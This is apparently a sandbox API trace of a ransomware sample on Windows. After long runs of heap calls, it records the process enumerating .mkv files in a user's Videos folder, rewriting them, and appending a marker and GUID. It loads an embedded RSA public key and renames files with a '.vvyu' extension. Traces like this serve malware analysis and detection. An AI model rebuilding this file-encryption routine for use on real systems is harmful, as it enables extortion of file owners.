HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0198.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5a0 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a558 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a540 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bfe0 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0198.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0198.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0198.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0198.340] GetCurrentThreadId () returned 0x264 [0198.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0198.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c3f0 [0198.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0198.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0198.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0198.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0198.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0198.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.341] GetCurrentThreadId () returned 0x264 [0198.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0198.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0198.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0198.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0198.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0198.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a5a0 [0198.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a540 [0198.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0198.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0198.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a558 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a528 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5b8 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a588 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a570 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a5d0 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a570 [0198.344] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a588 | out: hHeap=0x6a0000) returned 1 [0198.344] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a540 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5a0 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5d0 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0198.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a540 | out: hHeap=0x6a0000) returned 1 [0198.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0198.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0198.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0198.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0198.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0198.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0198.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0198.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0198.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0198.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a570 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a5b8 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a558 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a528 | out: hHeap=0x6a0000) returned 1 [0198.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4d790 | out: hHeap=0x6a0000) returned 1 [0198.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0198.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0198.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0198.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2d6b8 | out: hHeap=0x6a0000) returned 1 [0198.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0198.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0198.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0198.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bfe0 | out: hHeap=0x6a0000) returned 1 [0198.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0198.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0198.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0198.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0198.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0198.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0198.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0198.352] WriteFile (in: hFile=0x52c, lpBuffer=0x2d51778*, nNumberOfBytesToWrite=0x14a2a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d51778*, lpNumberOfBytesWritten=0x30ffb14*=0x14a2a, lpOverlapped=0x0) returned 1 [0198.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d51778 | out: hHeap=0x6a0000) returned 1 [0198.353] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x14a2f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.353] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0198.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0198.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0198.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0198.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0198.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0198.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0198.355] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0198.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0198.355] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.355] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0198.356] CloseHandle (hObject=0x52c) returned 1 [0198.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b578 [0198.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0198.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b578 | out: hHeap=0x6a0000) returned 1 [0198.358] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\3Exl.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\3exl.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\3Exl.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\3exl.mkv.vvyu")) returned 1 [0198.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0198.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0198.361] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0198.364] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75d09ef0, ftCreationTime.dwHighDateTime=0x1d89e48, ftLastAccessTime.dwLowDateTime=0x3febb5a0, ftLastAccessTime.dwHighDateTime=0x1d8a08b, ftLastWriteTime.dwLowDateTime=0x3febb5a0, ftLastWriteTime.dwHighDateTime=0x1d8a08b, nFileSizeHigh=0x0, nFileSizeLow=0x125ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ffcaMnGKKb8gMcSQDpq.mkv", cAlternateFileName="FFCAMN~1.MKV")) returned 1 [0198.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0198.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x106) returned 0x2c4bb80 [0198.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49790 | out: hHeap=0x6a0000) returned 1 [0198.364] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\ffcaMnGKKb8gMcSQDpq.mkv") returned=".mkv" [0198.365] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\Y5X8\\0o41ZS\\LzHDQsiji02\\ffcaMnGKKb8gMcSQDpq.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\y5x8\\0o41zs\\lzhdqsiji02\\ffcamngkkb8gmcsqdpq.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0198.365] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=75182) returned 1 [0198.365] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0198.368] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x12588, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.368] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0198.370] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.370] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x125ae, lpOverlapped=0x0) returned 1 [0198.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0198.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.371] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.371] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0198.373] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0198.373] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.373] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0198.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0198.373] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0198.373] GetLastError () returned 0x0 [0198.373] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0198.373] CryptReleaseContext (hProv=0x6eab40, dwFlags=0x0) returned 1 [0198.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0198.374] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 